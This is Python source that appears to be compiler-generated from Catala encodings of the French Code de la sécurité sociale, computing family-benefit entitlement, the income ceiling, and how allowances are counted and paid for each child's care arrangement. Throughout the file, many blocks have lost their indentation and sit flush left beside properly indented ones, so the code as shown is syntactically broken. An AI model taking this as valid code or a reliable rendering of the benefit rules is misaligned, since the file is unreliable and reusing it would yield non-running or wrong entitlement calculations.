    # --- plafond_l512_3_2: SMIC x 55% x 169 h.  The article R755-0-2 branch
    # and the fallback use the same formula; the exception structure is kept
    # as generated ---
    try:
        try:
            try:
                try:
                    if log_decision_taken(SourcePosition(filename="./securite_sociale_R.catala_fr",
                            start_line=216, start_column=18,
                            end_line=216, end_column=41,
                            law_headings=["Article R755-0-2",
                            "Chapitre 5 : Prestations familiales et prestations assimilées",
                            "Titre 5 : Départements d'outre-mer",
                            "Livre 7 : Régimes divers - Dispositions diverses",
                            "Partie réglementaire - Décrets en Conseil d'Etat",
                            "Code de la sécurité sociale"]), regime_outre_mer_l751_1_58):
                        local_var_61 = ((smic_dot_brut_horaire_57 *
                            decimal_of_string("0.55")) *
                            decimal_of_string("169."))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            except EmptyError:
                try:
                    local_var_61 = ((smic_dot_brut_horaire_57 *
                        decimal_of_string("0.55")) *
                        decimal_of_string("169."))
                except EmptyError:
                    raise EmptyError
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=67, start_column=11,
            end_line=67, end_column=27,
            law_headings=["Prologue"]))
    plafond_l512_3_2_60 = log_variable_definition(["PrestationsFamiliales",
        "plafond_l512_3_2"], local_var_61)
    # --- conditions_hors_age: closure over one child.  Computes one boolean
    # per schooling status (Avant/Pendant/Après) and applies the income
    # ceiling of article L512-3; an empty result maps to False ---
    try:
        def local_var_63(param_64: Enfant):
            try:
                try:
                    try:
                        # Each if-chain is exhaustive over
                        # SituationObligationScolaire_Code.
                        match_arg_540 = param_64.obligation_scolaire
                        if match_arg_540.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_540.value
                            local_var_73 = False
                        elif match_arg_540.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_540.value
                            local_var_73 = False
                        elif match_arg_540.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_540.value
                            local_var_73 = True
                        match_arg_541 = param_64.obligation_scolaire
                        if match_arg_541.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_541.value
                            local_var_69 = False
                        elif match_arg_541.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_541.value
                            local_var_69 = True
                        elif match_arg_541.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_541.value
                            local_var_69 = False
                        match_arg_542 = param_64.obligation_scolaire
                        if match_arg_542.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_542.value
                            local_var_65 = True
                        elif match_arg_542.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_542.value
                            local_var_65 = False
                        elif match_arg_542.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_542.value
                            local_var_65 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=68, start_column=5,
                                end_line=71, end_column=57,
                                law_headings=["Article L512-3",
                                "Chapitre 2 : Champ d'application",
                                "Titre 1 : Champ d'application - Généralités",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), ((local_var_65 or
                                (local_var_69 or local_var_73)) and
                                (param_64.remuneration_mensuelle <=
                                plafond_l512_3_2_60))):
                            return True
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                except EmptyError:
                    # Condition not met: the child fails the non-age criteria.
                    return False
            except EmptyError:
                raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                    start_line=66,
                    start_column=10,
                    end_line=66,
                    end_column=29,
                    law_headings=["Prologue"]))
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=66, start_column=10,
            end_line=66, end_column=29,
            law_headings=["Prologue"]))
    conditions_hors_age_62 = log_variable_definition(["PrestationsFamiliales",
        "conditions_hors_âge"], local_var_63)
    # --- droit_ouvert: closure over one child.  handle_default tries, in
    # order: the "Après" branch (income and age conditions of L512-3), then
    # the "Avant/Pendant" branch; the base case yields False ---
    try:
        def local_var_78(param_79: Enfant):
            try:
                # Base case: no entitlement by default.
                def local_var_98(_: Any):
                    return False
                # Justification (./prologue.catala_fr l.65): always true.
                def local_var_96(_: Any):
                    return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                        start_line=65, start_column=10,
                        end_line=65, end_column=22,
                        law_headings=["Prologue"]), True)
                # Before/during compulsory schooling: entitled.
                def local_var_86(_: Any):
                    try:
                        match_arg_543 = param_79.obligation_scolaire
                        if match_arg_543.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_543.value
                            local_var_92 = False
                        elif match_arg_543.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_543.value
                            local_var_92 = True
                        elif match_arg_543.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_543.value
                            local_var_92 = False
                        match_arg_544 = param_79.obligation_scolaire
                        if match_arg_544.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_544.value
                            local_var_88 = True
                        elif match_arg_544.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_544.value
                            local_var_88 = False
                        elif match_arg_544.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_544.value
                            local_var_88 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=49, start_column=5,
                                end_line=50, end_column=50,
                                law_headings=["Article L512-3",
                                "Chapitre 2 : Champ d'application",
                                "Titre 1 : Champ d'application - Généralités",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), (local_var_88 or
                                local_var_92)):
                            return True
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                # After compulsory schooling: entitled only while income is
                # under plafond_l512_3_2 and age is below age_l512_3_2.
                def local_var_80(_: Any):
                    try:
                        match_arg_545 = param_79.obligation_scolaire
                        if match_arg_545.code == SituationObligationScolaire_Code.Avant:
                            _ = match_arg_545.value
                            local_var_82 = False
                        elif match_arg_545.code == SituationObligationScolaire_Code.Pendant:
                            _ = match_arg_545.value
                            local_var_82 = False
                        elif match_arg_545.code == SituationObligationScolaire_Code.Apres:
                            _ = match_arg_545.value
                            local_var_82 = True
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=60, start_column=5,
                                end_line=62, end_column=32,
                                law_headings=["Article L512-3",
                                "Chapitre 2 : Champ d'application",
                                "Titre 1 : Champ d'application - Généralités",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), (local_var_82 and
                                ((param_79.remuneration_mensuelle <=
                                plafond_l512_3_2_60) and (param_79.age <
                                age_l512_3_2_36)))):
                            return True
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                return handle_default([local_var_80, local_var_86],
                    local_var_96, local_var_98)
            except EmptyError:
                raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                    start_line=65,
                    start_column=10,
                    end_line=65,
                    end_column=22,
                    law_headings=["Prologue"]))
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=65, start_column=10,
            end_line=65, end_column=22,
            law_headings=["Prologue"]))
    droit_ouvert_77 = log_variable_definition(["PrestationsFamiliales",
        "droit_ouvert"], local_var_78)
    return PrestationsFamilialesOut(droit_ouvert_out=droit_ouvert_77,
        conditions_hors_age_out=conditions_hors_age_62,
        age_l512_3_2_out=age_l512_3_2_36,
        regime_outre_mer_l751_1_out=regime_outre_mer_l751_1_58,
        base_mensuelle_out=base_mensuelle_38)
def allocations_familiales(allocations_familiales_in_100: AllocationsFamilialesIn):
personne_charge_effective_permanente_est_parent_101 = allocations_familiales_in_100.personne_charge_effective_permanente_est_parent_in
personne_charge_effective_permanente_remplit_titre__i_102 = allocations_familiales_in_100.personne_charge_effective_permanente_remplit_titre_I_in
ressources_menage_103 = allocations_familiales_in_100.ressources_menage_in
residence_104 = allocations_familiales_in_100.residence_in
date_courante_105 = allocations_familiales_in_100.date_courante_in
enfants_a_charge_106 = allocations_familiales_in_100.enfants_a_charge_in
avait_enfant_a_charge_avant_1er_janvier_2012_107 = allocations_familiales_in_100.avait_enfant_a_charge_avant_1er_janvier_2012_in
try:
def local_var_109(param_110: Enfant):
try:
def local_var_153(_: Any):
raise EmptyError
def local_var_151(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=102, start_column=11,
end_line=102, end_column=26,
law_headings=["Prologue"]), True)
def local_var_143(_: Any):
try:
match_arg_546 = param_110.prise_en_charge
if match_arg_546.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_546.value
local_var_145 = True
elif match_arg_546.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_546.value
local_var_145 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=184, start_column=5,
end_line=184, end_column=60,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_145):
return PriseEnCompte(PriseEnCompte_Code.Complete,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_135(_: Any):
try:
match_arg_547 = param_110.prise_en_charge
if match_arg_547.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_547.value
local_var_137 = True
elif match_arg_547.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_547.value
local_var_137 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=204, start_column=5,
end_line=204, end_column=69,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_137):
return PriseEnCompte(PriseEnCompte_Code.Complete,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_127(_: Any):
try:
match_arg_548 = param_110.prise_en_charge
if match_arg_548.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_548.value
local_var_129 = True
elif match_arg_548.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_548.value
local_var_129 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=214, start_column=5,
end_line=214, end_column=70,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_129):
return PriseEnCompte(PriseEnCompte_Code.Partagee,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
                def local_var_119(_: Any):
                    # Catala default-calculus exception branch for "prise_en_compte":
                    # a child whose allowance is paid to the social services
                    # (ServicesSociauxAllocationVerseeAuxServicesSociaux) counts
                    # as Zero. Otherwise this rule is empty (EmptyError) and
                    # handle_default tries another branch.
                    try:
                        match_arg_549 = param_110.prise_en_charge
                        # Exhaustive match on the PriseEnCharge enum; only the
                        # last alternative makes the guard true.
                        if match_arg_549.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_549.value
                            local_var_121 = False
                        elif match_arg_549.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_549.value
                            local_var_121 = False
                        elif match_arg_549.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_549.value
                            local_var_121 = False
                        elif match_arg_549.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_549.value
                            local_var_121 = False
                        elif match_arg_549.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_549.value
                            local_var_121 = True
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=253, start_column=5,
                            end_line=254, end_column=56,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_121):
                            return PriseEnCompte(PriseEnCompte_Code.Zero,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                def local_var_111(_: Any):
                    # Catala default-calculus exception branch for "prise_en_compte":
                    # a child whose allowance is paid to the family by the social
                    # services (ServicesSociauxAllocationVerseeALaFamille) counts
                    # as Complete. Otherwise this rule is empty (EmptyError).
                    try:
                        match_arg_550 = param_110.prise_en_charge
                        # Exhaustive match on the PriseEnCharge enum; only the
                        # fourth alternative makes the guard true.
                        if match_arg_550.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_550.value
                            local_var_113 = False
                        elif match_arg_550.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_550.value
                            local_var_113 = False
                        elif match_arg_550.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_550.value
                            local_var_113 = False
                        elif match_arg_550.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_550.value
                            local_var_113 = True
                        elif match_arg_550.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_550.value
                            local_var_113 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=263, start_column=5,
                            end_line=264, end_column=48,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_113):
                            return PriseEnCompte(PriseEnCompte_Code.Complete,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
return handle_default([local_var_111, local_var_119,
local_var_127, local_var_135,
local_var_143], local_var_151,
local_var_153)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=102,
start_column=11,
end_line=102,
end_column=26,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=102, start_column=11,
end_line=102, end_column=26,
law_headings=["Prologue"]))
prise_en_compte_108 = log_variable_definition(["AllocationsFamiliales",
"prise_en_compte"], local_var_109)
try:
        def local_var_156(param_157: Enfant):
            # Scope variable "versement" of AllocationsFamiliales: given a
            # child, decides how the allowance is paid out, from the child's
            # care arrangement (prise_en_charge). Each inner closure is one
            # exception branch of the Catala default calculus; handle_default
            # tries the branches and falls back to the base justification /
            # consequence pair (local_var_198 / local_var_200).
            try:
                def local_var_200(_: Any):
                    # Base consequence: there is no default value — always empty.
                    raise EmptyError
                def local_var_198(_: Any):
                    # Base justification: unconditionally true (logged with the
                    # position of the "versement" declaration).
                    return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                        start_line=103, start_column=11,
                        end_line=103, end_column=20,
                        law_headings=["Prologue"]), True)
                def local_var_190(_: Any):
                    # Branch: effective and permanent care -> Normal payment.
                    try:
                        match_arg_551 = param_157.prise_en_charge
                        if match_arg_551.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_551.value
                            local_var_192 = False
                        elif match_arg_551.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_551.value
                            local_var_192 = False
                        elif match_arg_551.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_551.value
                            local_var_192 = True
                        elif match_arg_551.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_551.value
                            local_var_192 = False
                        elif match_arg_551.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_551.value
                            local_var_192 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=188, start_column=5,
                            end_line=188, end_column=60,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_192):
                            return VersementAllocations(VersementAllocations_Code.Normal,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                def local_var_182(_: Any):
                    # Branch: alternating custody, single payee -> Normal payment.
                    try:
                        match_arg_552 = param_157.prise_en_charge
                        if match_arg_552.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_552.value
                            local_var_184 = False
                        elif match_arg_552.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_552.value
                            local_var_184 = True
                        elif match_arg_552.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_552.value
                            local_var_184 = False
                        elif match_arg_552.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_552.value
                            local_var_184 = False
                        elif match_arg_552.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_552.value
                            local_var_184 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=208, start_column=5,
                            end_line=208, end_column=69,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_184):
                            return VersementAllocations(VersementAllocations_Code.Normal,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                def local_var_174(_: Any):
                    # Branch: alternating custody, allowance split -> Normal payment.
                    try:
                        match_arg_553 = param_157.prise_en_charge
                        if match_arg_553.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_553.value
                            local_var_176 = True
                        elif match_arg_553.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_553.value
                            local_var_176 = False
                        elif match_arg_553.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_553.value
                            local_var_176 = False
                        elif match_arg_553.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_553.value
                            local_var_176 = False
                        elif match_arg_553.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_553.value
                            local_var_176 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=218, start_column=5,
                            end_line=218, end_column=70,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_176):
                            return VersementAllocations(VersementAllocations_Code.Normal,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                def local_var_166(_: Any):
                    # Branch: allowance paid to the social services -> payment
                    # goes to the social services.
                    try:
                        match_arg_554 = param_157.prise_en_charge
                        if match_arg_554.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_554.value
                            local_var_168 = False
                        elif match_arg_554.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_554.value
                            local_var_168 = False
                        elif match_arg_554.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_554.value
                            local_var_168 = False
                        elif match_arg_554.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_554.value
                            local_var_168 = False
                        elif match_arg_554.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_554.value
                            local_var_168 = True
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=258, start_column=5,
                            end_line=259, end_column=56,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_168):
                            return VersementAllocations(VersementAllocations_Code.AllocationVerseeAuxServicesSociaux,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                def local_var_158(_: Any):
                    # Branch: allowance paid to the family by the social
                    # services -> Normal payment.
                    try:
                        match_arg_555 = param_157.prise_en_charge
                        if match_arg_555.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
                            _ = match_arg_555.value
                            local_var_160 = False
                        elif match_arg_555.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
                            _ = match_arg_555.value
                            local_var_160 = False
                        elif match_arg_555.code == PriseEnCharge_Code.EffectiveEtPermanente:
                            _ = match_arg_555.value
                            local_var_160 = False
                        elif match_arg_555.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
                            _ = match_arg_555.value
                            local_var_160 = True
                        elif match_arg_555.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
                            _ = match_arg_555.value
                            local_var_160 = False
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                            start_line=269, start_column=5,
                            end_line=270, end_column=48,
                            law_headings=["Article L521-2",
                            "Chapitre 1er : Allocations familiales",
                            "Titre 2 : Prestations générales d'entretien",
                            "Livre 5 : Prestations familiales et prestations assimilées",
                            "Partie législative",
                            "Code de la sécurité sociale"]), local_var_160):
                            return VersementAllocations(VersementAllocations_Code.Normal,
                                Unit())
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                # Try the exception branches in the generated priority order,
                # falling back to the (justification, consequence) base case.
                return handle_default([local_var_158, local_var_166,
                    local_var_174, local_var_182,
                    local_var_190], local_var_198,
                    local_var_200)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=103,
start_column=11,
end_line=103,
end_column=20,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=103, start_column=11,
end_line=103, end_column=20,
law_headings=["Prologue"]))
versement_155 = log_variable_definition(["AllocationsFamiliales",
"versement"], local_var_156)
try:
local_var_203 = integer_of_string("3")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=151, start_column=11,
end_line=151, end_column=32,
law_headings=["Prologue"]))
nombre_enfants_l521_1_202 = log_variable_definition(["AllocationsFamiliales",
"nombre_enfants_l521_1"], local_var_203)
try:
local_var_205 = integer_of_string("3")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=153, start_column=11,
end_line=153, end_column=41,
law_headings=["Prologue"]))
nombre_enfants_alinea_2_l521_3_204 = log_variable_definition(["AllocationsFamiliales",
"nombre_enfants_alinéa_2_l521_3"], local_var_205)
result_206 = log_end_call(["AllocationsFamiliales", "version_avril_2008",
"AllocationFamilialesAvril2008"],
log_begin_call(["AllocationsFamiliales", "version_avril_2008",
"AllocationFamilialesAvril2008"], allocation_familiales_avril2008,
AllocationFamilialesAvril2008In()))
version_avril_2008_dot_age_minimum_alinea_1_l521_3_207 = result_206.age_minimum_alinea_1_l521_3_out
try:
try:
try:
local_var_210 = date_courante_105
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_209 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.date_courante"], local_var_210)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=70, start_column=10,
end_line=70, end_column=23,
law_headings=["Prologue"]))
prestations_familiales_dot_date_courante_208 = local_var_209
try:
try:
try:
local_var_213 = ElementPrestationsFamiliales(ElementPrestationsFamiliales_Code.AllocationsFamiliales,
Unit())
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_212 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.prestation_courante"], local_var_213)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=71, start_column=10,
end_line=71, end_column=29,
law_headings=["Prologue"]))
prestations_familiales_dot_prestation_courante_211 = local_var_212
try:
try:
try:
local_var_216 = residence_104
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_215 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.résidence"], local_var_216)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=72, start_column=10,
end_line=72, end_column=19,
law_headings=["Prologue"]))
prestations_familiales_dot_residence_214 = local_var_215
result_217 = log_end_call(["AllocationsFamiliales",
"prestations_familiales", "PrestationsFamiliales"],
log_begin_call(["AllocationsFamiliales", "prestations_familiales",
"PrestationsFamiliales"], prestations_familiales,
PrestationsFamilialesIn(date_courante_in=prestations_familiales_dot_date_courante_208,
prestation_courante_in=prestations_familiales_dot_prestation_courante_211,
residence_in=prestations_familiales_dot_residence_214)))
prestations_familiales_dot_droit_ouvert_218 = result_217.droit_ouvert_out
prestations_familiales_dot_conditions_hors_age_219 = result_217.conditions_hors_age_out
prestations_familiales_dot_age_l512_3_2_220 = result_217.age_l512_3_2_out
prestations_familiales_dot_regime_outre_mer_l751_1_221 = result_217.regime_outre_mer_l751_1_out
prestations_familiales_dot_base_mensuelle_222 = result_217.base_mensuelle_out
try:
try:
try:
local_var_225 = enfants_a_charge_106
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_224 = log_variable_definition(["AllocationsFamiliales",
"enfant_le_plus_âgé.enfants"], local_var_225)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=84, start_column=10,
end_line=84, end_column=17,
law_headings=["Prologue"]))
enfant_le_plus_age_dot_enfants_223 = local_var_224
result_226 = log_end_call(["AllocationsFamiliales",
"enfant_le_plus_âgé", "EnfantLePlusÂgé"],
log_begin_call(["AllocationsFamiliales", "enfant_le_plus_âgé",
"EnfantLePlusÂgé"], enfant_le_plus_age,
EnfantLePlusAgeIn(enfants_in=enfant_le_plus_age_dot_enfants_223)))
enfant_le_plus_age_dot_le_plus_age_227 = result_226.le_plus_age_out
try:
        def local_var_229(param_230: Enfant):
            # Scope variable "âge_minimum_alinéa_1_l521_3": minimum age for a
            # child, per Article R521-1. If the child's eleventh birthday falls
            # on or before 2008-04-30, the pre-April-2008 value from the
            # AllocationFamilialesAvril2008 sub-scope applies; otherwise the
            # default of 14 (inner `except EmptyError` fallback) is used.
            try:
                try:
                    try:
                        try:
                            if log_decision_taken(SourcePosition(filename="./securite_sociale_R.catala_fr",
                                start_line=83, start_column=19,
                                end_line=83, end_column=69,
                                law_headings=["Article R521-1",
                                "Chapitre 1er : Allocations familiales",
                                "Titre 2 : Prestations générales d'entretien",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie réglementaire - Décrets en Conseil d'Etat",
                                "Code de la sécurité sociale"]), ((param_230.date_de_naissance +
                                duration_of_numbers(11, 0, 0)) <=
                                date_of_numbers(2008, 4, 30))):
                                return version_avril_2008_dot_age_minimum_alinea_1_l521_3_207
                            else:
                                raise EmptyError
                        except EmptyError:
                            raise EmptyError
                    except EmptyError:
                        # Default when the April-2008 rule is empty.
                        return integer_of_string("14")
                except EmptyError:
                    raise EmptyError
            except EmptyError:
                raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                    start_line=152,
                    start_column=11,
                    end_line=152,
                    end_column=38,
                    law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=152, start_column=11,
end_line=152, end_column=38,
law_headings=["Prologue"]))
age_minimum_alinea_1_l521_3_228 = log_variable_definition(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"], local_var_229)
try:
try:
try:
                def local_var_233(enfant_234: Any):
                    # Filter predicate: calls the prestations_familiales
                    # "droit_ouvert" function on one child, wrapped in the
                    # runtime's begin-call / input / output / end-call logging.
                    return log_end_call(["PrestationsFamiliales",
                        "droit_ouvert"],
                        log_variable_definition(["PrestationsFamiliales",
                        "droit_ouvert", "output"],
                        log_begin_call(["PrestationsFamiliales",
                        "droit_ouvert"],
                        prestations_familiales_dot_droit_ouvert_218,
                        log_variable_definition(["PrestationsFamiliales",
                        "droit_ouvert", "input"], enfant_234))))
